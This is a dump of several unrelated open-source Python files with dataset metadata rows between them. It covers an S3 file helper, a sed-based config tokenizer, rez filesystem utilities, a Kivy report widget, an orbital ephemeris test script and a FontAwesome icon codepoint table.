with open(local_path, 'rb') as fp:
return self.call("PutObject", bucket=bucket, key=key, body=fp)
def download(self, remote_url, local_path, buffer_size=8 * 1024):
"""Copy S3 data to a local file."""
bucket, key = _parse_url(remote_url)
response_file = self.call("GetObject", bucket=bucket, key=key)['Body']
with open(local_path, 'wb') as fp:
buf = response_file.read(buffer_size)
while buf:
fp.write(buf)
buf = response_file.read(buffer_size)
def copy(self, src_url, dst_url):
"""Copy an S3 object to another S3 location."""
src_bucket, src_key = _parse_url(src_url)
dst_bucket, dst_key = _parse_url(dst_url)
if not dst_bucket:
dst_bucket = src_bucket
params = {
'copy_source': '/'.join((src_bucket, src_key)),
'bucket': dst_bucket,
'key': dst_key,
}
return self.call("CopyObject", **params)
def move(self, src_url, dst_url):
"""Copy a single S3 object to another S3 location, then delete the
original object."""
self.copy(src_url, dst_url)
self.destroy(src_url)
|
mit
| -417,330,416,866,376,600
| 29.923664
| 78
| 0.555172
| false
| 3.93301
| false
| false
| false
|
idjaw/dot-manager
|
app/core/tokenizer.py
|
1
|
2196
|
from functools import wraps
from re import search
from subprocess import call
from logging import getLogger
from core.exceptions import TokenizationError
log = getLogger("Tokenizer")
def exception_decorator(func):
@wraps(func)
def func_wrapper(*args, **kw):
try:
return func(*args, **kw)
except Exception as e:
log.error("Tokenization failed: {}".format(e))
raise TokenizationError(message=e)
return func_wrapper
class Tokenizer(object):
@exception_decorator
def tokenize(self, file_path, token_list):
log.debug("Tokenizing: {}".format(file_path))
for token in token_list:
call(
'''
sed \
's/{0}\([[:space:]]*=[[:space:]]*\"*\).*[^\"*]/{0}\\1__{0}__/' \
{1} >{1}_new ; mv {1}_new {1}
'''.format(token, file_path),
shell=True
)
log.debug("Tokenized")
@exception_decorator
def replace_tokens_with_actual(self, src_path, tokenized_path, token_list):
token_to_actual_map = self.token_to_actual_data_mapping(
src_path,
token_list
)
for token in token_list:
call(
'''
sed 's/{0}\([[:space:]]*=[[:space:]]*\"*\).*[^\"*]/{0}\\1{2}/' \
{3} >{3}_new ; mv {3}_new {3}
'''.format(
token.strip('_'),
token,
token_to_actual_map.get(token),
tokenized_path
),
shell=True
)
log.debug("Tokenized")
@exception_decorator
def token_to_actual_data_mapping(self, path, token_list):
token_mapper = {}
with open(path) as f:
file_data = f.readlines()
for i in token_list:
stripped = i.strip('_')
for fi in file_data:
matcher = search(
r'({0})\s*=\s*"*(.*[^"*])'.format(stripped), fi
)
if matcher:
token_mapper[i] = matcher.group(2).rstrip()
return token_mapper
|
mit
| -1,021,853,459,590,033,300
| 29.5
| 80
| 0.473133
| false
| 4.021978
| false
| false
| false
|
nerdvegas/rez
|
src/rez/utils/filesystem.py
|
1
|
20893
|
"""
Filesystem-related utilities.
"""
from __future__ import print_function
from threading import Lock
from tempfile import mkdtemp
from contextlib import contextmanager
from uuid import uuid4
import errno
import weakref
import atexit
import posixpath
import ntpath
import os.path
import shutil
import os
import re
import stat
import platform
from rez.vendor.six import six
from rez.utils.platform_ import platform_
is_windows = platform.system() == "Windows"
class TempDirs(object):
"""Tempdir manager.
Makes tmpdirs and ensures they're cleaned up on program exit.
"""
instances_lock = Lock()
instances = []
def __init__(self, tmpdir, prefix="rez_"):
self.tmpdir = tmpdir
self.prefix = prefix
self.dirs = set()
self.lock = Lock()
with TempDirs.instances_lock:
TempDirs.instances.append(weakref.ref(self))
def mkdtemp(self, cleanup=True):
path = mkdtemp(dir=self.tmpdir, prefix=self.prefix)
if not cleanup:
return path
with self.lock:
self.dirs.add(path)
return path
def __del__(self):
self.clear()
def clear(self):
with self.lock:
if not self.dirs:
return
dirs = self.dirs
self.dirs = set()
for path in dirs:
if os.path.exists(path) and not os.getenv("REZ_KEEP_TMPDIRS"):
shutil.rmtree(path)
@classmethod
def clear_all(cls):
with TempDirs.instances_lock:
instances = cls.instances[:]
for ref in instances:
instance = ref()
if instance is not None:
instance.clear()
atexit.register(TempDirs.clear_all)
@contextmanager
def make_path_writable(path):
"""Temporarily make `path` writable, if possible.
Args:
path (str): Path to make temporarily writable
"""
try:
orig_mode = os.stat(path).st_mode
new_mode = orig_mode
if not os.access(path, os.W_OK):
new_mode = orig_mode | stat.S_IWUSR
# make writable
if new_mode != orig_mode:
os.chmod(path, new_mode)
except OSError:
# ignore access errors here, and just do nothing. It will be more
# intuitive for the calling code to fail on access instead.
#
orig_mode = None
new_mode = None
# yield, then reset mode back to original
try:
yield
finally:
if new_mode != orig_mode:
os.chmod(path, orig_mode)
@contextmanager
def retain_cwd():
"""Context manager that keeps cwd unchanged afterwards.
"""
cwd = os.getcwd()
try:
yield
finally:
os.chdir(cwd)
def get_existing_path(path, topmost_path=None):
"""Get the longest parent path in `path` that exists.
If `path` exists, it is returned.
Args:
path (str): Path to test
topmost_path (str): Do not test this path or above
Returns:
str: Existing path, or None if no path was found.
"""
prev_path = None
if topmost_path:
topmost_path = os.path.normpath(topmost_path)
while True:
if os.path.exists(path):
return path
path = os.path.dirname(path)
if path == prev_path:
return None
if topmost_path and os.path.normpath(path) == topmost_path:
return None
prev_path = path
def safe_listdir(path):
"""Safe listdir.
Works in a multithread/proc scenario where dirs may be deleted at any time
"""
try:
return os.listdir(path)
except OSError as e:
if e.errno in (errno.ENOENT, errno.ENOTDIR):
return []
raise
def safe_makedirs(path):
"""Safe makedirs.
Works in a multithreaded scenario.
"""
if not os.path.exists(path):
try:
os.makedirs(path)
except OSError:
if not os.path.exists(path):
raise
def safe_remove(path):
"""Safely remove the given file or directory.
Works in a multithreaded scenario.
"""
if not os.path.exists(path):
return
try:
if os.path.isdir(path) and not os.path.islink(path):
shutil.rmtree(path)
else:
os.remove(path)
except OSError:
if os.path.exists(path):
raise
def forceful_rmtree(path):
"""Like shutil.rmtree, but may change permissions.
Specifically, non-writable dirs within `path` can cause rmtree to fail. This
func chmod's to writable to avoid this issue, if possible.
Also handled:
* path length over 259 char (on Windows)
* unicode path
"""
if six.PY2:
path = unicode(path)
def _on_error(func, path, exc_info):
try:
if is_windows:
path = windows_long_path(path)
parent_path = os.path.dirname(path)
if not os.access(parent_path, os.W_OK):
st = os.stat(parent_path)
os.chmod(parent_path, st.st_mode | stat.S_IWUSR)
if not os.access(path, os.W_OK):
st = os.stat(path)
os.chmod(path, st.st_mode | stat.S_IWUSR)
except:
# avoid confusion by ensuring original exception is reraised
pass
func(path)
shutil.rmtree(path, onerror=_on_error)
def replacing_symlink(source, link_name):
"""Create symlink that overwrites any existing target.
"""
with make_tmp_name(link_name) as tmp_link_name:
os.symlink(source, tmp_link_name)
replace_file_or_dir(link_name, tmp_link_name)
def replacing_copy(src, dest, follow_symlinks=False):
"""Perform copy that overwrites any existing target.
Will copy/copytree `src` to `dest`, and will remove `dest` if it exists,
regardless of what it is.
If `follow_symlinks` is False, symlinks are preserved, otherwise their
contents are copied.
Note that this behavior is different to `shutil.copy`, which copies src
into dest if dest is an existing dir.
"""
with make_tmp_name(dest) as tmp_dest:
if os.path.islink(src) and not follow_symlinks:
# special case - copy just a symlink
src_ = os.readlink(src)
os.symlink(src_, tmp_dest)
elif os.path.isdir(src):
# copy a dir
shutil.copytree(src, tmp_dest, symlinks=(not follow_symlinks))
else:
# copy a file
shutil.copy2(src, tmp_dest)
replace_file_or_dir(dest, tmp_dest)
def replace_file_or_dir(dest, source):
"""Replace `dest` with `source`.
Acts like an `os.rename` if `dest` does not exist. Otherwise, `dest` is
deleted and `src` is renamed to `dest`.
"""
from rez.vendor.atomicwrites import replace_atomic
if not os.path.exists(dest):
try:
os.rename(source, dest)
return
except:
if not os.path.exists(dest):
raise
try:
replace_atomic(source, dest)
return
except:
pass
with make_tmp_name(dest) as tmp_dest:
os.rename(dest, tmp_dest)
os.rename(source, dest)
def additive_copytree(src, dst, symlinks=False, ignore=None):
"""Version of `copytree` that merges into an existing directory.
"""
if not os.path.exists(dst):
os.makedirs(dst)
for item in os.listdir(src):
s = os.path.join(src, item)
d = os.path.join(dst, item)
if os.path.isdir(s):
additive_copytree(s, d, symlinks, ignore)
else:
shutil.copy2(s, d)
@contextmanager
def make_tmp_name(name):
"""Generates a tmp name for a file or dir.
This is a tempname that sits in the same dir as `name`. If it exists on
disk at context exit time, it is deleted.
"""
path, base = os.path.split(name)
# there's a reason this isn't a hidden file:
# https://github.com/nerdvegas/rez/pull/1088
#
tmp_base = "_tmp-%s-%s" % (base, uuid4().hex)
tmp_name = os.path.join(path, tmp_base)
try:
yield tmp_name
finally:
safe_remove(tmp_name)
def is_subdirectory(path_a, path_b):
"""Returns True if `path_a` is a subdirectory of `path_b`."""
path_a = os.path.realpath(path_a)
path_b = os.path.realpath(path_b)
try:
relative = os.path.relpath(path_a, path_b)
except ValueError:
# Different mounts on Windows:
# ValueError: path is on mount 'c:', start on mount 'd:'
#
return False
return not relative.startswith(os.pardir + os.sep)
def find_matching_symlink(path, source):
"""Find a symlink under `path` that points at `source`.
If source is relative, it is considered relative to `path`.
Returns:
str: Name of symlink found, or None.
"""
def to_abs(target):
if os.path.isabs(target):
return target
else:
return os.path.normpath(os.path.join(path, target))
abs_source = to_abs(source)
for name in os.listdir(path):
linkpath = os.path.join(path, name)
if os.path.islink(linkpath):
source_ = os.readlink(linkpath)
if to_abs(source_) == abs_source:
return name
return None
def copy_or_replace(src, dst):
'''try to copy with mode, and if it fails, try replacing
'''
try:
shutil.copy(src, dst)
except (OSError, IOError) as e:
# It's possible that the file existed, but was owned by someone
# else - in that situation, shutil.copy might then fail when it
# tries to copy perms.
# However, it's possible that we have write perms to the dir -
# in which case, we can just delete and replace
import errno
if e.errno == errno.EPERM:
import tempfile
# try copying into a temporary location beside the old
# file - if we have perms to do that, we should have perms
# to then delete the old file, and move the new one into
# place
if os.path.isdir(dst):
dst = os.path.join(dst, os.path.basename(src))
dst_dir, dst_name = os.path.split(dst)
dst_temp = tempfile.mktemp(prefix=dst_name + '.', dir=dst_dir)
shutil.copy(src, dst_temp)
if not os.path.isfile(dst_temp):
raise RuntimeError(
"shutil.copy completed successfully, but path"
" '%s' still did not exist" % dst_temp)
os.remove(dst)
shutil.move(dst_temp, dst)
def copytree(src, dst, symlinks=False, ignore=None, hardlinks=False):
'''copytree that supports hard-linking
'''
names = os.listdir(src)
if ignore is not None:
ignored_names = ignore(src, names)
else:
ignored_names = set()
if hardlinks:
def copy(srcname, dstname):
try:
# try hard-linking first
os.link(srcname, dstname)
except OSError:
shutil.copy2(srcname, dstname)
else:
copy = shutil.copy2
if not os.path.isdir(dst):
os.makedirs(dst)
errors = []
for name in names:
if name in ignored_names:
continue
srcname = os.path.join(src, name)
dstname = os.path.join(dst, name)
try:
if symlinks and os.path.islink(srcname):
linkto = os.readlink(srcname)
os.symlink(linkto, dstname)
elif os.path.isdir(srcname):
copytree(srcname, dstname, symlinks, ignore)
else:
copy(srcname, dstname)
# XXX What about devices, sockets etc.?
except (IOError, os.error) as why:
errors.append((srcname, dstname, str(why)))
# catch the Error from the recursive copytree so that we can
# continue with other files
except shutil.Error as err:
errors.extend(err.args[0])
try:
shutil.copystat(src, dst)
except shutil.WindowsError:
# can't copy file access times on Windows
pass
except OSError as why:
errors.extend((src, dst, str(why)))
if errors:
raise shutil.Error(errors)
def movetree(src, dst):
"""Attempts a move, and falls back to a copy+delete if this fails
"""
try:
shutil.move(src, dst)
except:
copytree(src, dst, symlinks=True, hardlinks=True)
shutil.rmtree(src)
def safe_chmod(path, mode):
"""Set the permissions mode on path, but only if it differs from the current mode.
"""
if stat.S_IMODE(os.stat(path).st_mode) != mode:
os.chmod(path, mode)
def to_nativepath(path):
path = path.replace('\\', '/')
return os.path.join(*path.split('/'))
def to_ntpath(path):
return ntpath.sep.join(path.split(posixpath.sep))
def to_posixpath(path):
return posixpath.sep.join(path.split(ntpath.sep))
def canonical_path(path, platform=None):
""" Resolves symlinks, and formats filepath.
Resolves symlinks, lowercases if filesystem is case-insensitive,
formats filepath using slashes appropriate for platform.
Args:
path (str): Filepath being formatted
platform (rez.utils.platform_.Platform): Indicates platform path is being
formatted for. Defaults to current platform.
Returns:
str: Provided path, formatted for platform.
"""
if platform is None:
platform = platform_
path = os.path.normpath(os.path.realpath(path))
if not platform.has_case_sensitive_filesystem:
return path.lower()
return path
def encode_filesystem_name(input_str):
"""Encodes an arbitrary unicode string to a generic filesystem-compatible
non-unicode filename.
The result after encoding will only contain the standard ascii lowercase
letters (a-z), the digits (0-9), or periods, underscores, or dashes
(".", "_", or "-"). No uppercase letters will be used, for
comaptibility with case-insensitive filesystems.
The rules for the encoding are:
1) Any lowercase letter, digit, period, or dash (a-z, 0-9, ., or -) is
encoded as-is.
2) Any underscore is encoded as a double-underscore ("__")
3) Any uppercase ascii letter (A-Z) is encoded as an underscore followed
by the corresponding lowercase letter (ie, "A" => "_a")
4) All other characters are encoded using their UTF-8 encoded unicode
representation, in the following format: "_NHH..., where:
a) N represents the number of bytes needed for the UTF-8 encoding,
except with N=0 for one-byte representation (the exception for N=1
is made both because it means that for "standard" ascii characters
in the range 0-127, their encoding will be _0xx, where xx is their
ascii hex code; and because it mirrors the ways UTF-8 encoding
itself works, where the number of bytes needed for the character can
be determined by counting the number of leading "1"s in the binary
representation of the character, except that if it is a 1-byte
sequence, there are 0 leading 1's).
b) HH represents the bytes of the corresponding UTF-8 encoding, in
hexadecimal (using lower-case letters)
As an example, the character "*", whose (hex) UTF-8 representation
of 2A, would be encoded as "_02a", while the "euro" symbol, which
has a UTF-8 representation of E2 82 AC, would be encoded as
"_3e282ac". (Note that, strictly speaking, the "N" part of the
encoding is redundant information, since it is essentially encoded
in the UTF-8 representation itself, but it makes the resulting
string more human-readable, and easier to decode).
As an example, the string "Foo_Bar (fun).txt" would get encoded as:
_foo___bar_020_028fun_029.txt
"""
if isinstance(input_str, six.string_types):
input_str = unicode(input_str)
elif not isinstance(input_str, unicode):
raise TypeError("input_str must be a %s" % six.string_types[0].__name__)
as_is = u'abcdefghijklmnopqrstuvwxyz0123456789.-'
uppercase = u'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
result = []
for char in input_str:
if char in as_is:
result.append(char)
elif char == u'_':
result.append('__')
elif char in uppercase:
result.append('_%s' % char.lower())
else:
utf8 = char.encode('utf8')
N = len(utf8)
if N == 1:
N = 0
HH = ''.join('%x' % ord(c) for c in utf8)
result.append('_%d%s' % (N, HH))
return ''.join(result)
_FILESYSTEM_TOKEN_RE = re.compile(r'(?P<as_is>[a-z0-9.-])|(?P<underscore>__)|_(?P<uppercase>[a-z])|_(?P<N>[0-9])')
_HEX_RE = re.compile('[0-9a-f]+$')
def decode_filesystem_name(filename):
"""Decodes a filename encoded using the rules given in encode_filesystem_name
to a unicode string.
"""
result = []
remain = filename
i = 0
while remain:
# use match, to ensure it matches from the start of the string...
match = _FILESYSTEM_TOKEN_RE.match(remain)
if not match:
raise ValueError("incorrectly encoded filesystem name %r"
" (bad index: %d - %r)" % (filename, i,
remain[:2]))
match_str = match.group(0)
match_len = len(match_str)
i += match_len
remain = remain[match_len:]
match_dict = match.groupdict()
if match_dict['as_is']:
result.append(unicode(match_str))
elif match_dict['underscore']:
result.append(u'_')
elif match_dict['uppercase']:
result.append(unicode(match_dict['uppercase'].upper()))
elif match_dict['N']:
N = int(match_dict['N'])
if N == 0:
N = 1
# hex-encoded, so need to grab 2*N chars
bytes_len = 2 * N
i += bytes_len
bytes = remain[:bytes_len]
remain = remain[bytes_len:]
# need this check to ensure that we don't end up eval'ing
# something nasty...
if not _HEX_RE.match(bytes):
raise ValueError("Bad utf8 encoding in name %r"
" (bad index: %d - %r)" % (filename, i, bytes))
bytes_repr = ''.join('\\x%s' % bytes[i:i + 2]
for i in xrange(0, bytes_len, 2))
bytes_repr = "'%s'" % bytes_repr
result.append(eval(bytes_repr).decode('utf8'))
else:
raise ValueError("Unrecognized match type in filesystem name %r"
" (bad index: %d - %r)" % (filename, i, remain[:2]))
return u''.join(result)
def test_encode_decode():
def do_test(orig, expected_encoded):
print('=' * 80)
print(orig)
encoded = encode_filesystem_name(orig)
print(encoded)
assert encoded == expected_encoded
decoded = decode_filesystem_name(encoded)
print(decoded)
assert decoded == orig
do_test("Foo_Bar (fun).txt", '_foo___bar_020_028fun_029.txt')
# u'\u20ac' == Euro symbol
do_test(u"\u20ac3 ~= $4.06", '_3e282ac3_020_07e_03d_020_0244.06')
def walk_up_dirs(path):
"""Yields absolute directories starting with the given path, and iterating
up through all it's parents, until it reaches a root directory"""
prev_path = None
current_path = os.path.abspath(path)
while current_path != prev_path:
yield current_path
prev_path = current_path
current_path = os.path.dirname(prev_path)
def windows_long_path(dos_path):
"""Prefix '\\?\' for path longer than 259 char (Win32API limitation)
"""
path = os.path.abspath(dos_path)
if path.startswith("\\\\?\\"):
pass
elif path.startswith("\\\\"):
path = "\\\\?\\UNC\\" + path[2:]
else:
path = "\\\\?\\" + path
return path
# Copyright 2013-2016 Allan Johns.
#
# This library is free software: you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation, either
# version 3 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library. If not, see <http://www.gnu.org/licenses/>.
|
lgpl-3.0
| -2,403,405,377,951,893,000
| 28.677557
| 114
| 0.59441
| false
| 3.891414
| false
| false
| false
|
victor-rene/kivy-test
|
gui/reportcell.py
|
1
|
1576
|
from kivy.graphics import Color, Rectangle
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.label import Label
from kivy.uix.widget import Widget
class ReportCell(BoxLayout):
def __init__(self, **kw):
super(ReportCell, self).__init__(**kw)
self.data = kw['data']
with self.canvas.before:
a = .5
b = .3
Color(b, a, b, 1.)
self.rect_run = Rectangle()
Color(a, b, b, 1.)
self.rect_miss = Rectangle()
Color(b, b, a, 1.)
self.rect_excl = Rectangle()
lbl = Label(size_hint=(1, 1))
lbl.text = '%s %s (%s/%s)' % (self.data[0], self.data[3], self.data[1],
self.data[2])
self.add_widget(lbl)
self.bind(pos=self._update_rect, size=self._update_rect)
def _update_rect(self, *args):
h = self.height
w = self.width
if float(self.data[1]) == 0.:
return
run_pct = (float(self.data[1]) - float(self.data[2])) / float(self.data[1])
miss_pct = float(self.data[2]) / float(self.data[1])
excl_pct = 1. - run_pct - miss_pct
# print run_pct, miss_pct, excl_pct
self.rect_run.pos = self.pos
self.rect_run.size = w * run_pct, h
self.rect_miss.pos = self.rect_run.pos[0] + self.rect_run.size[0], self.rect_run.pos[1]
self.rect_miss.size = w * miss_pct, h
self.rect_excl.pos = self.rect_miss.pos[0] + self.rect_miss.size[0], self.rect_miss.pos[1]
self.rect_excl.size = w * excl_pct, h
|
mit
| -8,431,501,857,110,692,000
| 36.547619
| 98
| 0.541244
| false
| 3.084149
| false
| false
| false
|
EUPSForge/oorb
|
python/test_2.py
|
1
|
4840
|
import os
import subprocess
import numpy as np
import matplotlib.pyplot as plt
from itertools import repeat
import pandas as pd
import pyoorb as oo
import time
def dtime(time_prev):
return (time.time() - time_prev, time.time())
def pack_oorbArray(orbits):
"""Translate orbital element dictionary (easy for humans) into pyoorb-suitable input orbit array."""
# Translate orbital elements into array that pyoorb will like.
# PyOrb wants ::
# 0: orbitId
# 1 - 6: orbital elements, using radians for angles
# 7: element type code, where 2 = cometary - means timescale is TT, too
# 8: epoch
# 9: timescale for the epoch; 1= MJD_UTC, 2=UT1, 3=TT, 4=TAI
# 10: magHv
# 11: G
elem_type = np.zeros(len(orbits)) + 2
epoch_type = np.zeros(len(orbits)) + 3
gval = np.zeros(len(orbits)) + 0.15
# Also, the orbitID has to be a float, rather than a string, so substitute if needed.
if ((isinstance(orbits['objid'][0], float) == True) |
(isinstance(orbits['objid'][0], int) == True)):
orbids = orbits['objid']
else:
orbids = np.arange(0, len(orbits['objid']), 1)
# Convert to format for pyoorb, INCLUDING converting inclination, node, argperi to RADIANS
oorbArray = np.column_stack((orbids, orbits['q'], orbits['e'], np.radians(orbits['i']),
np.radians(orbits['node']), np.radians(orbits['argperi']),
orbits['t_p'], elem_type, orbits['t_0'], epoch_type, orbits['H'], gval))
return oorbArray
if __name__ == "__main__":
t = time.time()
print "starting..."
# check against OpenOrb command line
timespan = 1000
timestep = 10
command = "/bin/rm test_out ; oorb --code=807 --task=ephemeris --orb-in=test_orbits.des --timespan=%d --step=%d > test_out" %(timespan, timestep)
print command
subprocess.call(command, shell=True)
dt, t = dtime(t)
print "Calculating ephemerides by command line took %f s "%(dt)
# Read the command line version back, to look for differences.
data = pd.read_table('test_out', sep="\s*", engine='python')
dt, t = dtime(t)
print "Reading data back from file %f s" %(dt)
print "Read %d ephemerides" %(len(data['RA']))
ctimes = data['MJD_UTC/UT1'][data['#Designation'] == 1]
print "Created %d unique times; %d times total" %(len(np.unique(data['MJD_UTC/UT1'])), len(ctimes))
# Read the orbits from disk.
# Read the orbits from disk.
dt, t = dtime(t)
orbits = pd.read_table('test_orbits.des', sep='\s*', engine='python')
newcols = orbits.columns.values
newcols[0] = 'objid'
orbits.columns = newcols
dt, t = dtime(t)
print "Reading %d orbits required %f s" %(len(orbits['q']), dt)
# convert orbit array to 'packed' form needed in oorb.
oorbArray = pack_oorbArray(orbits)
# set up oorb.
ephfile = os.path.join(os.getenv('OORB_DATA'), 'de430.dat')
oo.pyoorb.oorb_init(ephemeris_fname=ephfile)
# set observatory code
obscode = 807
# Set up dates to predict ephemerides.
timestart = orbits['t_0'][0]
times = np.arange(timestart, timestart + timespan + timestep/2.0, timestep)
times = np.array(ctimes)
# For pyoorb, we need to tag times with timescales;
# 1= MJD_UTC, 2=UT1, 3=TT, 4=TAI
ephTimes = np.array(zip(times, repeat(1, len(times))), dtype='double')
print times
dt, t = dtime(t)
print "Ready for ephemeris generation .. %f s" %(dt)
# Generate ephemerides.
oorbephs, err = oo.pyoorb.oorb_ephemeris(in_orbits = oorbArray, in_obscode=obscode, in_date_ephems=ephTimes)
dt, t = dtime(t)
print "Calculating ephemerides by python required %f s" %(dt)
# Returned ephems contain a 3-D Fortran array of ephemerides, the axes are:
# [objid][time][ephemeris information element]
# the ephemeris information elements are (in order):
# distance, ra, dec, mag, ephem mjd, ephem mjd timescale, dradt(sky), ddecdt(sky)
# per object, per date, 8 elements (array shape is OBJ(s)/DATE(s)/VALUES)
# Note that ra/dec, dradt, etc. are all in DEGREES.
# First: (to arrange ephems for easier later use)
# Swap the order of the axes: DATE / Objs / values
# Unpack ephemerides.
times = np.ravel(oorbephs.swapaxes(0, 1).swapaxes(0, 2)[4])
ra = np.ravel(oorbephs.swapaxes(0, 1).swapaxes(0, 2)[1])
dec = np.ravel(oorbephs.swapaxes(0, 1).swapaxes(0, 2)[2])
radiff = data['RA'] - ra
decdiff = data['Dec'] - dec
radiff *= 3600
decdiff *= 3600
print "min/max ra offsets", radiff.min(), radiff.max()
print "min/max dec offsets", decdiff.min(), decdiff.max()
plt.figure()
plt.plot(radiff, decdiff, 'k.')
plt.xlabel('Difference in RA (arcsec)')
plt.ylabel('Difference in Dec (arcsec)')
#plt.show()
|
gpl-3.0
| 2,614,545,079,291,372,500
| 37.412698
| 149
| 0.633884
| false
| 2.980296
| false
| false
| false
|
diegomvh/pyqt
|
widgets/glyph/codepoints/fontawesome.py
|
1
|
15278
|
#!/usr/bin/env python
import sys
if sys.version_info[0] == 3:
unichr = chr
#A list of all icon-names with the codepoint (unicode-value) on the right
#You can use the names on the page http://fortawesome.github.io/Font-Awesome/design.html
_codepoints = [
("fa-adjust", 0xf042),
("fa-adn", 0xf170),
("fa-align-center", 0xf037),
("fa-align-justify", 0xf039),
("fa-align-left", 0xf036),
("fa-align-right", 0xf038),
("fa-ambulance", 0xf0f9),
("fa-anchor", 0xf13d),
("fa-android", 0xf17b),
("fa-angle-double-down", 0xf103),
("fa-angle-double-left", 0xf100),
("fa-angle-double-right", 0xf101),
("fa-angle-double-up", 0xf102),
("fa-angle-down", 0xf107),
("fa-angle-left", 0xf104),
("fa-angle-right", 0xf105),
("fa-angle-up", 0xf106),
("fa-apple", 0xf179),
("fa-archive", 0xf187),
("fa-arrow-circle-down", 0xf0ab),
("fa-arrow-circle-left", 0xf0a8),
("fa-arrow-circle-o-down", 0xf01a),
("fa-arrow-circle-o-left", 0xf190),
("fa-arrow-circle-o-right", 0xf18e),
("fa-arrow-circle-o-up", 0xf01b),
("fa-arrow-circle-right", 0xf0a9),
("fa-arrow-circle-up", 0xf0aa),
("fa-arrow-down", 0xf063),
("fa-arrow-left", 0xf060),
("fa-arrow-right", 0xf061),
("fa-arrow-up", 0xf062),
("fa-arrows", 0xf047),
("fa-arrows-alt", 0xf0b2),
("fa-arrows-h", 0xf07e),
("fa-arrows-v", 0xf07d),
("fa-asterisk", 0xf069),
("fa-automobile", 0xf1b9),
("fa-backward", 0xf04a),
("fa-ban", 0xf05e),
("fa-bank", 0xf19c),
("fa-bar-chart-o", 0xf080),
("fa-barcode", 0xf02a),
("fa-bars", 0xf0c9),
("fa-beer", 0xf0fc),
("fa-behance", 0xf1b4),
("fa-behance-square", 0xf1b5),
("fa-bell", 0xf0f3),
("fa-bell-o", 0xf0a2),
("fa-bitbucket", 0xf171),
("fa-bitbucket-square", 0xf172),
("fa-bitcoin", 0xf15a),
("fa-bold", 0xf032),
("fa-bolt", 0xf0e7),
("fa-bomb", 0xf1e2),
("fa-book", 0xf02d),
("fa-bookmark", 0xf02e),
("fa-bookmark-o", 0xf097),
("fa-briefcase", 0xf0b1),
("fa-btc", 0xf15a),
("fa-bug", 0xf188),
("fa-building", 0xf1ad),
("fa-building-o", 0xf0f7),
("fa-bullhorn", 0xf0a1),
("fa-bullseye", 0xf140),
("fa-cab", 0xf1ba),
("fa-calendar", 0xf073),
("fa-calendar-o", 0xf133),
("fa-camera", 0xf030),
("fa-camera-retro", 0xf083),
("fa-car", 0xf1b9),
("fa-caret-down", 0xf0d7),
("fa-caret-left", 0xf0d9),
("fa-caret-right", 0xf0da),
("fa-caret-square-o-down", 0xf150),
("fa-caret-square-o-left", 0xf191),
("fa-caret-square-o-right", 0xf152),
("fa-caret-square-o-up", 0xf151),
("fa-caret-up", 0xf0d8),
("fa-certificate", 0xf0a3),
("fa-chain", 0xf0c1),
("fa-chain-broken", 0xf127),
("fa-check", 0xf00c),
("fa-check-circle", 0xf058),
("fa-check-circle-o", 0xf05d),
("fa-check-square", 0xf14a),
("fa-check-square-o", 0xf046),
("fa-chevron-circle-down", 0xf13a),
("fa-chevron-circle-left", 0xf137),
("fa-chevron-circle-right", 0xf138),
("fa-chevron-circle-up", 0xf139),
("fa-chevron-down", 0xf078),
("fa-chevron-left", 0xf053),
("fa-chevron-right", 0xf054),
("fa-chevron-up", 0xf077),
("fa-child", 0xf1ae),
("fa-circle", 0xf111),
("fa-circle-o", 0xf10c),
("fa-circle-o-notch", 0xf1ce),
("fa-circle-thin", 0xf1db),
("fa-clipboard", 0xf0ea),
("fa-clock-o", 0xf017),
("fa-cloud", 0xf0c2),
("fa-cloud-download", 0xf0ed),
("fa-cloud-upload", 0xf0ee),
("fa-cny", 0xf157),
("fa-code", 0xf121),
("fa-code-fork", 0xf126),
("fa-codepen", 0xf1cb),
("fa-coffee", 0xf0f4),
("fa-cog", 0xf013),
("fa-cogs", 0xf085),
("fa-columns", 0xf0db),
("fa-comment", 0xf075),
("fa-comment-o", 0xf0e5),
("fa-comments", 0xf086),
("fa-comments-o", 0xf0e6),
("fa-compass", 0xf14e),
("fa-compress", 0xf066),
("fa-copy", 0xf0c5),
("fa-credit-card", 0xf09d),
("fa-crop", 0xf125),
("fa-crosshairs", 0xf05b),
("fa-css3", 0xf13c),
("fa-cube", 0xf1b2),
("fa-cubes", 0xf1b3),
("fa-cut", 0xf0c4),
("fa-cutlery", 0xf0f5),
("fa-dashboard", 0xf0e4),
("fa-database", 0xf1c0),
("fa-dedent", 0xf03b),
("fa-delicious", 0xf1a5),
("fa-desktop", 0xf108),
("fa-deviantart", 0xf1bd),
("fa-digg", 0xf1a6),
("fa-dollar", 0xf155),
("fa-dot-circle-o", 0xf192),
("fa-download", 0xf019),
("fa-dribbble", 0xf17d),
("fa-dropbox", 0xf16b),
("fa-drupal", 0xf1a9),
("fa-edit", 0xf044),
("fa-eject", 0xf052),
("fa-ellipsis-h", 0xf141),
("fa-ellipsis-v", 0xf142),
("fa-empire", 0xf1d1),
("fa-envelope", 0xf0e0),
("fa-envelope-o", 0xf003),
("fa-envelope-square", 0xf199),
("fa-eraser", 0xf12d),
("fa-eur", 0xf153),
("fa-euro", 0xf153),
("fa-exchange", 0xf0ec),
("fa-exclamation", 0xf12a),
("fa-exclamation-circle", 0xf06a),
("fa-exclamation-triangle", 0xf071),
("fa-expand", 0xf065),
("fa-external-link", 0xf08e),
("fa-external-link-square", 0xf14c),
("fa-eye", 0xf06e),
("fa-eye-slash", 0xf070),
("fa-facebook", 0xf09a),
("fa-facebook-square", 0xf082),
("fa-fast-backward", 0xf049),
("fa-fast-forward", 0xf050),
("fa-fax", 0xf1ac),
("fa-female", 0xf182),
("fa-fighter-jet", 0xf0fb),
("fa-file", 0xf15b),
("fa-file-archive-o", 0xf1c6),
("fa-file-audio-o", 0xf1c7),
("fa-file-code-o", 0xf1c9),
("fa-file-excel-o", 0xf1c3),
("fa-file-image-o", 0xf1c5),
("fa-file-movie-o", 0xf1c8),
("fa-file-o", 0xf016),
("fa-file-pdf-o", 0xf1c1),
("fa-file-photo-o", 0xf1c5),
("fa-file-picture-o", 0xf1c5),
("fa-file-powerpoint-o", 0xf1c4),
("fa-file-sound-o", 0xf1c7),
("fa-file-text", 0xf15c),
